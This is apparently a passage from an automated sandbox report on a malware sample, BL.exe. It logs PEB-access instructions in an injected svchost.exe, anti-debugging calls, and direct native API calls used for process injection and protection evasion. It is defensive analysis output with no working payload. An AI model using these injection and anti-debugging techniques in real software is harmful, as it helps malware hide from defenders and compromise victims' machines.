            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtCreateKey: Direct from: 0x77382C6C
